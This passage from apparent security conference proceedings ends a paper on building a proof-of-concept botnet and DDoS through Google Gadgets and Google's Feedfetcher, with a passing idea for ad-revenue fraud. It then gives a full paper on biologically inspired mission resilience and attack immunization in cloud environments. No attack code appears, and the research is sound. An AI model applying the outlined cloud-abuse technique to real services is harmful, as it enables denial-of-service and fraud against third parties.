5. Future work<br />

This paper merely wishes to illustrate the ease of generating a potential Botnet using services<br />
provided by Google Gadgets. In actuality, the only true exploit was the fact that Google allows users to<br />
use Google servers to fetch remote content. The fact that Google gadgets require JavaScript in order<br />
to run simply facilitates the process of automating the attack.<br />

The whole spectrum of JavaScript-based attacks can be used with Google’s services. The ability to<br />

execute code from Google’s computers can lead to other misdirection attacks. Google is not the only<br />

commercial player in the internet cloud space. Similar attacks may be possible from Microsoft, Yahoo<br />

or Amazon services. We aim to investigate this in future research.<br />

In this paper we did not investigate the possibility of AdSense revenue generation. By registering with an<br />
impression-based advertising mechanism, such as Adgator, a Botherder can generate revenue simply by<br />
issuing delayed, repetitive fetch requests. More complex techniques are proposed by Hansen and<br />
Stracener (2008) to add click-through or Pay-Per-Click advertising schemes.<br />

The Botnet Gadget suffers from several critical weaknesses. Because the Botnet Gadget relies on<br />
the Google Feedfetcher agent to make remote requests, it can easily be stopped by blocking all requests<br />
from this agent, but this would also block legitimate Feedfetcher requests from Google Reader.<br />
Another potential weakness is that Google gadget source code needs to be accessible by Google<br />
Gadget Servers; hence, if a malicious gadget is detected, Google can easily remove the Gadget and<br />
the Botherder will lose all its Bots.<br />

6. Conclusion<br />

In this paper we reiterated the views of Stracener (2008) and Hubbard et al. (2010) that as the<br />

computer user base moves towards cloud computing, so too will the security threats. We used<br />

Hubbard’s seven key threat indicators to try and identify possible routes of attack for our research.<br />




First, we defined the four key components of a Botnet. We then provided examples of how these<br />

components can be mimicked by Cloud services and specifically by Google’s gadget API and how<br />

they match the Cloud security threats identified by Hubbard. The API was capable of reproducing<br />

each component’s functionality to a limited degree, with very little alteration of freely available<br />

web resources.<br />

We combined these components to form a simple but working botnet. Although limited in scope, a<br />

simple DDoS attack was achieved by using Google servers as the attacking computers. Current<br />
botnets concentrate on using personal and corporate computers, but as users move into<br />
cloud computing, the botnets will follow.<br />

We identified several weak points in our current design and identified some possible areas for future<br />

development of Cloud botnet research. This is still a rather new field and as such this paper hopes to<br />

serve as a possible point of reference for future work.<br />

References<br />

Banks, S. & Strytz, M., 2007. Bot armies: an introduction. [Online] SPIE Available at:<br />

http://spie.org/x15000.xml?ArticleID=x15000 [Accessed 10 October 2010].<br />

Bullock, D., 2010. IP Address Geolocation JSON API. [Online] Available at:<br />

http://ipinfodb.com/ip_location_api_json.php [Accessed 8 October 2010].<br />

Cabri, R., 2007. Spyjax - Your browser history is not private! [Online] Available at:<br />

http://www.techtalkz.com/news/Security/Spyjax-Your-browser-history-is-not-private.html [Accessed 7<br />

October 2010].<br />

Denis, B., 2008. Anatomy of the Asprox Botnet. [Online] VeriSign Available at:<br />

http://xylibox.free.fr/AnatomyOfTheASPROXBotnet.pdf [Accessed 30 September 2010].<br />

Engate, 2009. Defending your network from Botnet threat. [Online] Engate Available at:<br />

http://ns1.happynet.com/images/datasheets/Engate_whitepaper.pdf [Accessed 9 October 2010].<br />

Eston, T., 2010. DigiNinja. [Online] Available at: http://www.digininja.org/ [Accessed 5 October 2010].<br />

Felix, F.C., Thorsten, H. & Wicherski, G., 2005. Botnet Tracking: Exploring a Root-Cause Methodology to Prevent<br />

Distributed Denial-of-Service Attacks. Computer Security – ESORICS 2005, 3679, pp.319-335.<br />

Gartner, 2008. Gartner Says Cloud Computing Will Be As Influential As E-business. Stamford: Gartner<br />
Inc.<br />

Google Gadgets API, 2009. Working with Remote Content. [Online] Google Available at:<br />

http://code.google.com/apis/gadgets/docs/remote-content.html [Accessed 7 October 2010].<br />

Google Webmaster Central, 2010. Feedfetcher. [Online] Google Available at:<br />

http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=178852 [Accessed 3 October<br />

2010].<br />

Hansen, R. & Stracener, T., 2008. Xploiting Google Gadgets: Gmalware and beyond. [Online] Available at:<br />

http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-stracener-hansen.pdf [Accessed 3<br />

October 2010].<br />

Hashemian, R.V., 2005. JavaScript Visitor IP Address and Host Name. [Online] Available at: I:\JavaScript Visitor<br />

IP Address and Host Name.mht [Accessed 3 October 2010].<br />

Hubbard, D. et al., 2010. Top Threats to Cloud Computing V1.0. Cloud Security Alliance.<br />

Kiefer, K.P., 2004. Background on Operation Web Snare. [Online] Available at:<br />

http://www.justice.gov/criminal/fraud/documents/reports/2004/websnare.pdf [Accessed 3 December 2010].<br />

Kortchinsky, K., 2009. Black Hat. [Online] Immunity, Inc. Available at: http://www.blackhat.com/presentations/bhusa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf<br />

[Accessed 16 November 2010].<br />

MacManus, R., 2008. Read Write Web. [Online] Available at:<br />

http://www.readwriteweb.com/archives/survey_48_of_bank_customers_wa.php [Accessed 6 October 2010].<br />

Ollmann, G., 2009. A Botnet by Any Other Name. [Online] Available at:<br />

http://www.securityfocus.com/columnists/501 [Accessed 11 October 2010].<br />

Peterson, V., 2009. Social Design Best Practices. [Online] Available at:<br />

http://wiki.opensocial.org/index.php?title=Social_Design_Best_Practices [Accessed 3 October 2010].<br />

Rutkowska, J., 2008. Black Hat. [Online] Coseinc Available at: http://www.blackhat.com/presentations/bh-usa-<br />

06/BH-US-06-Rutkowska.pdf [Accessed 16 November 2010].<br />

Stracene, T., 2008. Securing Widgets and Gadgets in the Web 2.0 World. [Online] Available at:<br />

http://blog.cenzic.com/public/blog/208285 [Accessed 6 October 2010].<br />

Vamosi, R., 2008. CNET News. [Online] Available at: http://news.cnet.com/8301-10789_3-10040669-57.html<br />

[Accessed 2 October 2010].<br />

Wang, A., 2009. Javascript Obfuscator . [Online] Available at: http://www.javascriptobfuscator.com/Default.aspx<br />

[Accessed 12 October 2010].<br />

41


Mission Resilience in Cloud Computing: A Biologically Inspired Approach

Marco Carvalho¹, Dipankar Dasgupta², Michael Grimaila³ and Carlos Perez¹
¹Florida Institute for Human and Machine Cognition, Pensacola, USA
²University of Memphis, USA
³Air Force Institute of Technology, Wright-Patterson AFB, USA
mcarvalho@ihmc.us
ddasgupt@memphis.edu
michael.grimaila@afit.edu
cperez@ihmc.us

Abstract: With the continuously improving capabilities enabling distributed computing, redundancy and diversity of services, cloud environments are becoming increasingly attractive for mission-critical and military operations. In such environments, mission assurance and survivability are key enabling factors for deployment, and must be provided as an intrinsic capability of the environment. Mission-critical frameworks must be safe and resistant to localized service failures and compromises. Furthermore, they must be able to autonomously learn and adapt to environmental challenges and mission requirements. In this paper, we present a biologically inspired approach to mission survivability in cloud computing environments. Our approach introduces a multi-layer infrastructure that implements threat and service-failure detection coupled with distributed assessment of mission risks, automated re-organization, and re-planning capabilities. Our approach leverages insights from developmental biology at the service orchestration level, and takes failures and risk estimations as weighting functions for resource allocation. The paper first introduces and formulates the proposed concept for a simple single-mission environment. We then propose a simulated scenario for proof-of-concept demonstration and preliminary evaluation, and conclude the paper with a brief discussion of results and future work.

Keywords: mission assurance, cloud computing, mission survivability, biologically-inspired resilience

1. Introduction

Mission survivability is recognized as the capacity to maintain the execution, and ensure the successful completion, of mission-critical systems, even under localized failures and attacks. In resource-constrained environments, mission survivability includes the prioritization of services and capabilities to maintain mission goals. Previous research efforts on mission assurance have focused on estimating the effects caused by localized failures (or attacks) on the mission, and on designing robust plans for impact minimization. These are challenging and important capabilities that rely on a mapping of mission tasks to associated components and their corresponding interdependencies. They generally provide mechanisms for the online evaluation of mission impact to support human intervention. There is a need to combine these capabilities with self-managing and resilient mission-critical frameworks. In the context of this work, a resilient mission-critical infrastructure is defined as a computational and communications infrastructure capable of maintaining successful mission execution (mission survivability) and of remaining mission-capable under localized disruptions, which normally requires the capacity to detect, identify, and recover from attacks.

More generally, an idealized resilient infrastructure must be able to seamlessly absorb local failures or attacks with no immediate impact on the mission, while also isolating and recovering from the problem in order to maintain its capacity to effectively execute subsequent missions. Such infrastructures are expected to be robust and adaptive, capable of learning from experience and improving their own performance and survivability.

The challenge is that most mission-critical systems have traditionally been designed for cost efficiency and performance, with little room for component redundancy and diversity (Cohen, 2005). Furthermore, they generally rely on fixed architectures and configurations, favoring predictability and control, often in lieu of self-management and run-time adaptability. However, in recent years the computational landscape for mission-critical systems has changed significantly with the increasing acceptance of service-oriented architectures as a new paradigm for systems design, and the introduction of cloud computing environments that provide large-scale, low-cost and agile commodity computing and storage capabilities. The prospect of highly redundant and adaptive systems is starting to become reality, as new adopters begin to leverage the capabilities of these combined technologies for high-end systems development.

Following several industry initiatives, the United States (US) Government has begun to consider this new landscape. For example, the Central Intelligence Agency (CIA) has recently reported that it is investing in cloud analytics, cloud widgets and services, cloud security-as-a-service, cloud enterprise data management and cloud infrastructure, using commercial IT technologies to analyze multi-lingual data, audio, Twitter tweets, video and text messages that add layers of complexity to intelligence gathering (Yasin, 2010).

When properly managed and coordinated, the new environment provides the means and tools for large-scale distributed systems development, including on-demand resource allocation, dynamic resource management, diversity in services and capabilities, intrinsic replication for data recovery, and several other capabilities. The challenge, however, is to coordinate all these powerful features in order to enable resilient mission-critical systems.

In this paper we introduce an organic approach to mission resilience in large-scale and adaptive computational environments. In particular, we focus on the issues of mission continuity and survivability in response to attacks, as well as runtime system management and adaptation. In section 2 we briefly discuss the challenges and requirements of mission-critical systems for SOA and cloud environments, together with some background on service discovery and orchestration. In section 3 we introduce our biologically-inspired approach to organic resilience for mission-critical systems, followed by some preliminary discussion of the proposed ideas, and conclusions.

2. Mission critical systems in the cloud

As previously defined, the goal of resilient mission-critical systems is to ensure the successful execution and completion of the mission while remaining mission-capable in response to localized failures and attacks. In the context of this work we are primarily concerned with the availability and integrity aspects of the problem. While data exfiltration and privacy are important and challenging issues in cloud environments, they are not considered in the scope of this work. We are primarily concerned with attacks or failures that may directly disrupt the mission. While there are multiple ways to describe and represent a mission, we will consider that a mission can be represented as a set of workflows, or a set of strictly ordered sequences of tasks, as illustrated in Figure 1.

In this example, a mission is composed of a set of workflows. Each workflow is composed of a set of ordered tasks and may represent, for instance, a set of image processing steps to be performed on imagery collected by aerial surveillance vehicles. Each processing step, represented by the tasks (A, F, G, and A), must be performed in strict order, and services 1, 4 and 7 have been tasked to jointly execute the workflow. It is important to note that service selection in this example may refer to the orchestration of services provided by a supporting Service Oriented Architecture (SOA) in the cloud.

Figure 1: Distributed execution of a mission represented as a set of workflows
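The mission model described above (a mission as a set of workflows, each a strictly ordered sequence of tasks jointly executed by assigned services) can be captured in a small data structure. A minimal sketch in Python; the class and field names are illustrative, not taken from the paper:

```python
from dataclasses import dataclass, field

@dataclass
class Task:
    """A single processing step; must run in the order given by its workflow."""
    name: str  # e.g. "A", "F", "G"

@dataclass
class Workflow:
    """A strictly ordered sequence of tasks, e.g. image-processing steps."""
    tasks: list
    assigned_services: list = field(default_factory=list)  # e.g. services 1, 4, 7

@dataclass
class Mission:
    """A mission is a set of workflows; success requires a minimum completion rate."""
    workflows: list

# Example mirroring Figure 1: steps A, F, G, A executed by services 1, 4 and 7
wf = Workflow(tasks=[Task("A"), Task("F"), Task("G"), Task("A")],
              assigned_services=[1, 4, 7])
mission = Mission(workflows=[wf])
```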


In Figure 1, mission success requires a minimum rate of images being successfully processed by the system. Failures or delays of any of the services engaged in the allocation will likely disrupt the execution of a workflow (i.e. the processing of one image, in this example) and eventually compromise the mission.

One of the main benefits provided by a cloud-computing environment (and supporting service-oriented capabilities) is the availability of resources that can be quickly engaged for service execution and released when no longer needed. The availability of multiple configurations and implementations for the same type of service (diversity), potentially provided by supporting Service Oriented Architectures or Software-as-a-Service (SaaS) architectures, is also critically important for resilient mission execution. Combined, these capabilities can be leveraged to:

- Enable a dynamic, elastic and automated computing framework for mission execution. This capability allows mission-critical systems to dynamically balance resource allocation based on operational context and mission requirements, without building massive amounts of idle overcapacity.
- Enable the parallel execution of critical tasks on demand, over heterogeneous software (and emulated hardware) systems.

The process of identifying and organizing the services for task execution (services 1, 4 and 7 in our example) requires a discovery mechanism and an orchestration process, which may be centralized or distributed. In most cases, the discovery and orchestration of services are based on protocols defined for Service Oriented Architectures operating over cloud computing environments. They often take place before mission execution, and remain fixed until a failure is detected or the mission is completed. In the following sections, we provide a brief review of conventional discovery and orchestration protocols often used in SOAs.

2.1 Service discovery in cloud environments

There are two aspects involved in service discovery on cloud-enabled frameworks: the identification of services capable of accomplishing a given task, and the identification of computational resources for executing the service. The first problem is often addressed by conventional service discovery algorithms for service oriented architectures or software-as-a-service (SaaS) running on cloud environments. The second part of the problem is generally provided as part of the cloud infrastructure itself.

The discovery of cloud resources enables dynamic load balancing and scalability by dynamically moving services and processes running in the cloud. Most cloud resource allocation services offer either a centralized or a hierarchical approach to this problem, but some authors have also proposed P2P strategies based on Distributed Hash Tables for resource management (Ranjan, 2010). As for service discovery, service developers often rely on different types of SOA service discovery, recognizing that some SOA-based services rely on capabilities (e.g. multicast-based discovery) not necessarily supported by some environments.
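The DHT-based P2P strategies cited above typically map node and resource identifiers onto a shared hash ring, so lookups need no central registry. A minimal consistent-hashing sketch in Python; the ring size, hash choice and node names are illustrative assumptions, and this is not the protocol from Ranjan (2010):

```python
import hashlib
from bisect import bisect_right

def ring_hash(key: str) -> int:
    """Hash a key onto a 32-bit identifier ring."""
    return int(hashlib.sha1(key.encode()).hexdigest(), 16) % (2 ** 32)

class HashRing:
    """Assigns each resource key to the first node clockwise on the ring,
    so any node can resolve an owner without a central registry."""
    def __init__(self, nodes):
        self._ring = sorted((ring_hash(n), n) for n in nodes)

    def node_for(self, resource_key: str) -> str:
        point = ring_hash(resource_key)
        ids = [h for h, _ in self._ring]
        idx = bisect_right(ids, point) % len(self._ring)  # wrap around the ring
        return self._ring[idx][1]

ring = HashRing(["node-1", "node-2", "node-3"])
owner = ring.node_for("image-processing-service")  # deterministic placement
```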

One of the earliest service discovery mechanisms available in web service environments was Universal Description, Discovery and Integration (UDDI) (Oasis, 2002), which provided a registry-based approach to service discovery. The approach did not gain strong adoption from industry: IBM, Microsoft, and SAP closed their public UDDI registries, and Microsoft moved UDDI services from Windows Server to its services orchestration product, BizTalk. It is possible that UDDI is still used inside organizations to dynamically find services within smaller domains, but the workgroup defining the standard completed its work in 2007. WS-Discovery (Oasis, 2009) provides an alternative approach to service discovery. WS-Discovery is a multicast discovery protocol that removes the need for a centralized registry; communication is mainly done using SOAP over UDP. WS-Discovery has found a niche amongst network device builders, but its adoption in cloud environments is limited due to the constraints on multicast traffic often imposed in those environments. Another discovery method that has been gaining attention is DNS-based discovery: Zeroconf, the protocol implemented by Apple's Bonjour, uses DNS and multicast DNS for service discovery.

One of the next challenges in service discovery is to enable semantic queries (Papazoglou, 2008), which involves adding semantic annotations and descriptions of QoS characteristics (Klusch, 2006; Benatallah, 2003; Lord, 2005). In 2007, the W3C published a recommendation for Semantic Annotations for WSDL (W3C, 2007), with limited adoption so far.

2.2 Service orchestration in cloud environments

Service orchestration generally refers to the composition of modular services to execute a task. The selection of a service is generally based on interface and capability descriptions. Much of the effort in service orchestration is focused on tools and languages for service and interface descriptions, such as the Business Process Execution Language (BPEL) and its web-services variation (WS-BPEL). In most cases, service orchestration is provided by centralized services such as Microsoft's BizTalk (Microsoft, 2010), amongst others. There are, however, some research efforts to enable peer-to-peer orchestration (Bradley, 2004). While centralized approaches to service orchestration are generally more effective for creating complex service structures, they represent a single point of failure in the process, which is undesirable for mission-critical systems. They also require an external correction to localized failures, which implies that service-wide disruptions must be perceived to trigger a reconfiguration of the service composition. A decentralized strategy for service orchestration, on the other hand, enables a more robust and emergent approach to the problem. Decentralized strategies are generally unable to provide the determinism and timing guarantees of centralized approaches, but if properly implemented they are better suited to address localized failures and disruptions.

3. Organic computing for mission resilience

In this paper we propose a multi-layer approach to system resilience that builds upon peer-to-peer discovery and orchestration strategies for mission management. Our approach builds upon previous research on resilient tactical infrastructures (Carvalho, 2010). It is biologically inspired in the sense that we combine insights from developmental biology, diversity and immunology, including inflammatory and immunization mechanisms. In our formulation, these biological traits are desirable capabilities that can be implemented in multiple ways by leveraging services and features enabled by cloud computing and our own support services. An illustrative view of the proposed architecture is shown in Figure 2. The service and resource management capabilities illustrated in the lower part of the figure are provided by the cloud computing and SOA (or SaaS) support services. The organic defense framework is implemented as the three upper layers in the system.

Figure 2: Proposed multi-layer defense architecture

For the purposes of the organic defense framework, the resource management and service management capabilities provide the mechanisms necessary for service response and adaptation. The organic defense infrastructure builds upon three supporting capabilities:

- Nodes and services are capable of identifying a localized failure or attack. This assumption is based on the fact that nodes engaged in mission-critical applications frequently interact with their neighbors, which allows them either to self-evaluate and identify a failure or degradation in performance, or to be notified by their peers of a performance problem.
- The defense infrastructure must be able to re-allocate mission-critical services to other (functionally equivalent) services and resources in the system. This capability enables a quick response to local disruptions and attacks, mitigating their immediate impact on the mission.
- The defense layer must be able to replace a service (i.e. shut down a compromised service and instantiate a new one) with a copy that is functionally equivalent but has a different implementation. This capability enables the system to recover recently lost capabilities, and to diversify its configuration in order to develop resiliency, and eventually immunity, against the attack.

Combined, these capabilities enable the multi-layer response infrastructure illustrated in Figure 2. The first (lower) layer manages the dynamic allocation of resources for mission execution. The second layer is responsible for the identification of, response to, and potential immunization against localized damage (i.e. failures or attacks) detected and reported by the first layer. The identification process consists of correlating the damage with the characteristics and configuration of the affected node. The response mechanism may include the quarantine, termination or re-initialization of the affected node. The immunization mechanism provided by the second layer includes the creation of functionally similar nodes with different software configurations (diversity).

In parallel, the third (and highest) layer coordinates the sharing of information about the attack, ensuring that a collective response (if appropriate) can be enforced, and that nodes that are functionally similar to the victim can be reconfigured to prevent a similar attack. A collective response to an attack may include, for instance, modifications in routing weights to disfavor the use of nodes that may have been compromised. While mutually supported and coordinated, the components of the proposed defense infrastructure must be loosely coupled to prevent a cascade failure in the event that one of them becomes temporarily impaired or permanently compromised. Although the coordinated operation of all three components is necessary to enable a comprehensive response and system resilience, each component can also operate independently with limited performance gains, ensuring a graceful degradation of the survivability infrastructure itself.

3.1 Damage detection

One of the assumptions of our approach is that individual services are capable of monitoring their own sensors and performance to detect local damage. In practice, damage detection may be implemented in multiple ways. In the context of mission continuity, damage is directly related to the inability of a service to execute its tasks, or to a significant degradation in task execution performance (below acceptable QoS requirements). From that perspective, there is no distinction between damage caused by localized failures and damage caused by malicious acts: the effects of both events are similar, as is the way in which the system responds.
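Under this definition, a service could flag local damage simply by checking its recent task-execution performance against an acceptable QoS bound, without distinguishing failure from attack. A hedged sketch in Python; the sliding-window size and latency threshold are illustrative assumptions, not values from the paper:

```python
from collections import deque

class DamageDetector:
    """Flags damage when the average task latency over a sliding window
    exceeds the acceptable QoS bound, regardless of whether the cause is
    a localized failure or a malicious act (as in the paper's model)."""
    def __init__(self, max_latency_s: float, window: int = 10):
        self.max_latency_s = max_latency_s
        self.samples = deque(maxlen=window)

    def record(self, latency_s: float) -> bool:
        """Record one task's latency; return True when damage is detected,
        i.e. when the upper layers should be notified."""
        self.samples.append(latency_s)
        avg = sum(self.samples) / len(self.samples)
        return avg > self.max_latency_s

det = DamageDetector(max_latency_s=2.0)
healthy = det.record(1.2)    # average within the QoS bound
degraded = det.record(9.0)   # average now above the bound: damage
```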

Other approaches to damage detection have also included statistical and biologically inspired techniques based on Danger Theory (Yuan, 2009) and Artificial Immune Systems (Dasgupta, 2002; Liang, 2006), amongst others. In most cases, damage detection is based on negative signature matching or anomaly detection associated with misbehaviors or performance degradations. Upon damage detection, the system will immediately notify the upper layers (for resource management and response/immunization), while in parallel trying to identify correlated features that could be linked (perhaps causally) to the event. Previous research efforts have been proposed for this purpose, including the application of Hidden Markov Models (Cho and Park, 2003; Ourston, Matzner, Stump and Hopkins, 2003), decision trees (Li and Ye, 2001; Abbes, Bouhoula, and Rusinowitch, 2004), and others.

3.2 Resource management for mission continuity

Automatic resource and service re-allocation in response to localized failures is common practice in Grid environments, and has also been previously proposed for enterprise (Lardieri et al, 2007) and tactical (Carvalho et al, 2005) environments. In general, however, a change in allocation strategy happens only after degradation (or failure) has taken place and its impact on the mission has been noted; there is generally no predictive re-allocation based on an increased risk of attack or failure learned at runtime from novel attacks.

Our proposed approach leverages and extends such dynamic allocation strategies to enable proactive task re-allocation based on online risk estimations. For our current proof-of-concept mission management layer implementation, we have adopted a greedy distributed coordination algorithm using a generalized cost metric per node for resource management. When a workflow is received, each node makes a local decision about task execution based on current local cost estimations. If the local cost becomes less attractive than a neighbor's estimated cost, the workflow is forwarded to the node with the lowest estimated cost. Cost information is shared between nodes involved in a joint mission as part of workflow exchange messages.
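The greedy placement rule just described can be sketched as follows. The dictionary-based node model, cost values and function name are illustrative assumptions, not the authors' implementation:

```python
def place_workflow(local_node: dict, workflow: dict):
    """Greedy local decision: execute the workflow here unless a neighbor
    advertises a lower estimated cost, in which case forward the workflow
    to the cheapest neighbor. Neighbor cost estimates are assumed to
    arrive piggybacked on workflow exchange messages."""
    costs = local_node["neighbor_costs"]
    cheapest = min(costs, key=costs.get)          # neighbor with lowest cost
    if local_node["cost"] <= costs[cheapest]:
        return ("execute", local_node["name"])    # local execution wins
    return ("forward", cheapest)                  # hand off the workflow

node = {"name": "n1", "cost": 5.0,
        "neighbor_costs": {"n2": 3.5, "n3": 7.0}}
decision = place_workflow(node, workflow={"tasks": ["A", "F", "G"]})
# n2 advertises the lowest estimated cost, so the workflow is forwarded there
```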

Attacks and failures may be detected indirectly, through their effects on the mission (see section 3.1). To simplify our model, we currently consider the degradation of a task as causing a direct impact on mission performance. There are, however, related research efforts on mission mapping (Musman et al., 2010; Sorrel et al., 2008; Grimaila, 2008) that can provide a better assessment of the impact of localized failures on the overall mission.

In general, the approach for detection may rely on a number of sources that include performance monitoring, anomaly detection, or resource utilization monitoring. These are all metrics that may be used to detect violations of resource utilization policies, or deviations from pre-defined (or learned, in the case of anomaly detection) QoS requirements for task execution.

Dynamic resource management for mission continuity focuses on isolating the area (i.e. the node or services) associated with the damage to minimize the impact on mission execution. The re-allocation of resources and re-organization of tasks is coordinated through distributed, self-organizing algorithms and may take place at different scales: from very localized modifications involving a single service that has reported damage, to larger-scale changes involving multiple services. An analog to this approach can be found in developmental biology, where cells (and other structures at different hierarchical levels) signal each other to induce a differentiation that will enable a needed capability. In our approach, mission-aware services will perceive the lack of a damaged capability and will signal other services (as part of a distributed orchestration mechanism) to engage new capabilities.

3.3 Response and immunization

The response and immunization mechanisms are responsible both for a short-term response to the reported damage and for a longer-term mitigation strategy against future attacks of the same type. The intuitive response to a damaged component that can be replaced by alternative services in the environment is to immediately terminate the affected service. However, depending on the type of attack, the response and immunization layer may benefit from keeping a potentially compromised node in operation. The goal is to identify the potential causes of the effects perceived as damage, and possibly correlate those events with the configuration of the node. This rudimentary approach to vulnerability estimation is useful in providing a hint to other services in the system that may be equally vulnerable to the same types of attacks. In our proposed infrastructure, the response and immunization mechanisms work together to allow some time for the system to build such correlations before shutting down the node in response to the damage. In order to do this without affecting the mission, a duplicate of each workflow (which has been re-allocated to alternative nodes in response to the damage) is still sent to the damaged node for processing, but it is tagged to be ignored by subsequent processing services. This allows the damaged component to remain 'active' for the characterization and immunization tasks.
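The duplicate-and-tag mechanism just described can be sketched as follows: the real copy of the workflow goes to a healthy node, while a tagged duplicate keeps the damaged node active for characterization without its output feeding the mission. The field names (`assigned_to`, `ignore_output`) are illustrative assumptions, not the authors' message format:

```python
def reissue_workflow(workflow: dict, healthy_node: str, damaged_node: str):
    """Send the live workflow to a healthy node, and a duplicate, tagged so
    that downstream services ignore its output, to the damaged node. This
    keeps the damaged node 'active' for characterization and immunization."""
    live = dict(workflow, assigned_to=healthy_node, ignore_output=False)
    probe = dict(workflow, assigned_to=damaged_node, ignore_output=True)
    return live, probe

live, probe = reissue_workflow({"id": 17, "tasks": ["A", "F", "G"]},
                               healthy_node="n4", damaged_node="n2")
```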

4. Preliminary experimental results

A first proof of concept of the proposed approach was implemented and tested in a simulated networked environment using NS3. Simulated scenarios allow for larger-scale experiments and controlled attack conditions, facilitating the evaluation and analysis of the proposed algorithm. For the purposes of our first tests we considered a single service running on each node of our conceptual network, so the terms 'service' and 'node' are used interchangeably in our discussions. We also disregarded the complexities associated with service descriptions and interfaces, focusing instead on the survivability and resilience aspects of the proposed approach. In our simulated scenario, each workflow is composed of 3 tasks, and a mission is composed of 400 workflows. There are 5 nodes (or services) executing independent parallel missions. In addition, there are 9 other nodes available to be engaged for task execution, and 6 additional nodes playing the role of attackers.


Each node has a short sequence of bits (arbitrarily chosen to be a 4-bit string in our simulations) that represents its configuration. For example, the sequence 0000 could indicate a Linux-based host running a given version of the Apache web server, with other specific libraries and configurations. A different sequence of bits would represent an alternative configuration for the same service capability. The execution of each task in the workflow takes between 1 and 2 seconds under normal operational conditions. The simulation runs for 1200 seconds, and the attacking nodes become active only after 200 seconds of simulation. At that point, each attacking node starts to launch attacks against a randomly selected victim every 6 seconds. Every task-processing node that receives an attack packet matches that attack against its own configuration (4-bit string). If at least a 75% match is found, the node accepts the attack and progressively degrades its performance.
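The acceptance rule can be stated compactly: count matching bits between the node's 4-bit configuration and the attack packet's signature, and accept the attack when at least 75% of the bits match. A sketch using the parameters stated above; the helper name is ours, not from the paper:

```python
def accepts_attack(node_config: str, attack_signature: str,
                   threshold: float = 0.75) -> bool:
    """A node is vulnerable when the fraction of matching bits between its
    configuration string and the attack signature reaches the threshold."""
    matches = sum(c == a for c, a in zip(node_config, attack_signature))
    return matches / len(node_config) >= threshold

# 3 of 4 bits match (75%): the node accepts the attack and degrades
vulnerable = accepts_attack("0000", "0001")
# only 2 of 4 bits match (50%): the attack has no effect
resistant = accepts_attack("0000", "0011")
```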

The scenario was executed with 20 different seeds and the results were averaged across those runs. The metric of interest for comparing results is the percentage of completed workflows at any given moment of the simulation. Two baselines representing the upper and lower operational boundaries of the system were computed. The first baseline, identified in the chart as "Clean Baseline" (Figure 3), represents the performance of the system when there are no attacks during the whole simulation. The second baseline, identified as "Attack Baseline" (Figure 3), represents the performance of the system under attack but without any corrective measures. As previously discussed, an organic response to the degrading attacks should include both a recovery and an adaptation component. The first strategy tested was a simple recovery strategy, consisting of restarting the compromised node from a previous safe image. This strategy was designed simply to mitigate the short-term effects of the problem. Figure 3 shows the performance of this strategy, identified as "Simple Reset" in the chart.

Figure 3: Mission performance in different operation conditions

A second strategy that was tested included, in addition to the short-term response, an adaptation strategy to enhance the resilience of the system to subsequent attacks. The adaptation strategy can take multiple approaches. One approach consists of randomizing the configuration of re-instantiated services and nodes. A second approach is to provide an immunization capability that drives mutations of re-instantiated services so that they become resistant to previous attacks. In our experiments we opted for the immunization strategy. The figure also shows the performance of this strategy, identified as "Immunization" in the chart.


Figure 4: Statistical significance of the performance gains due to the immunization strategy<br />

In the “Simple Reset” strategy, nodes detect and identify the attack and then reboot from a previously known safe state. The attack detection happens indirectly (through the effects of the attack) and the identification happens by correlating the detection with the current state of the node. This process takes some time, during which the services of the node are degraded. In the “Immunization” strategy, the nodes additionally identify a “mutation” strategy that is likely to make them less vulnerable to the same attack. For our simulated scenario, the state of the node is represented by a 4-bit string and defines how vulnerable a node is to a given attack. The immunization process additionally involves announcing the 4-bit string to other nodes, which will drive “similar” nodes to mutate in order to become resistant to the attack. In the scenario illustrated in Figure 3, the “Immunization” strategy starts with results close to the “Simple Reset” strategy, but then improves, getting close to the upper operational boundaries of the system (“Clean Baseline”). Figure 4 shows how the p-value changes across time for a t-test of the difference in percentage of completed missions between the “Immunization” and “Simple Reset” strategies. Approximately 300 seconds into the simulation, the difference in performance between the “Immunization” and “Simple Reset” strategies becomes statistically significant. While very simplified at this point, our initial results seem to indicate that an immunization-based strategy is more effective than a reactive approach based on simple node reset. Under the simplifying assumption that immunization has a fixed cost, fast recovery from continuous attacks will eventually be less effective than a longer, but more permanent, recovery from the same kinds of attacks.
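As a hedged illustration of this mechanism, the 4-bit mutation and announcement logic can be sketched as follows. The vulnerability model, function names and the similarity threshold are our own simplifications for illustration, not the actual simulation code:

```python
import random

BITS = 4  # node state is a 4-bit string, as in the simulated scenario

def hamming(a, b):
    """Number of bit positions in which two states differ."""
    return sum(x != y for x, y in zip(a, b))

def mutate_away(state, attack_sig, rng):
    """Flip one bit where the state still agrees with the attack signature."""
    candidates = [i for i in range(BITS) if state[i] == attack_sig[i]]
    if not candidates:
        return state  # already maximally different from the signature
    i = rng.choice(candidates)
    flipped = "1" if state[i] == "0" else "0"
    return state[:i] + flipped + state[i + 1:]

def immunize(states, attack_sig, similarity=1, seed=0):
    """Victims mutate away from the announced signature, and so do 'similar'
    nodes (Hamming distance <= similarity), driving herd resistance."""
    rng = random.Random(seed)
    return [mutate_away(s, attack_sig, rng) if hamming(s, attack_sig) <= similarity else s
            for s in states]

nodes = ["1010", "1011", "0000"]  # "1010" is the vulnerable state here
survivors = immunize(nodes, attack_sig="1010")
```

After immunization no node retains the announced vulnerable state, while dissimilar nodes are left untouched, which is the qualitative behavior the simulation relies on.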

5. Conclusions

In this paper we have described a three-layer concept for system resilience in distributed computational environments such as those found in cloud computing and service oriented architectures. Our proposal is based on the notions of self-organization and self-maintenance, leveraging distributed coordination algorithms for mission continuity. After a brief discussion of the capabilities enabled by cloud computing, service oriented architectures and some of their core services, we introduced our organic resilience approach. We defined a three-layer defense infrastructure responsible for detecting damage (i.e. failures or attacks), maintaining mission execution, and identifying a short-term response and an immunization path for the problem. We also defined a very simplified scenario to illustrate the basic concepts of the proposed approach. In our simulations, services are equated to computational nodes in a distributed environment to simplify the simulations and allow for the use of a network simulator as the basis for test and evaluation. Our goal with these initial experiments was to illustrate the proposed concept, rather than making any quantitative claims. As part of our future work in this project we plan to more rigorously define the adaptation and diversification algorithms, and to better evaluate the agility, overhead and effectiveness of the proposed approach.



Acknowledgments

This material is partially based upon work supported by the Department of Energy National Energy Technology Laboratory under Award Number(s) DE-OE0000511.

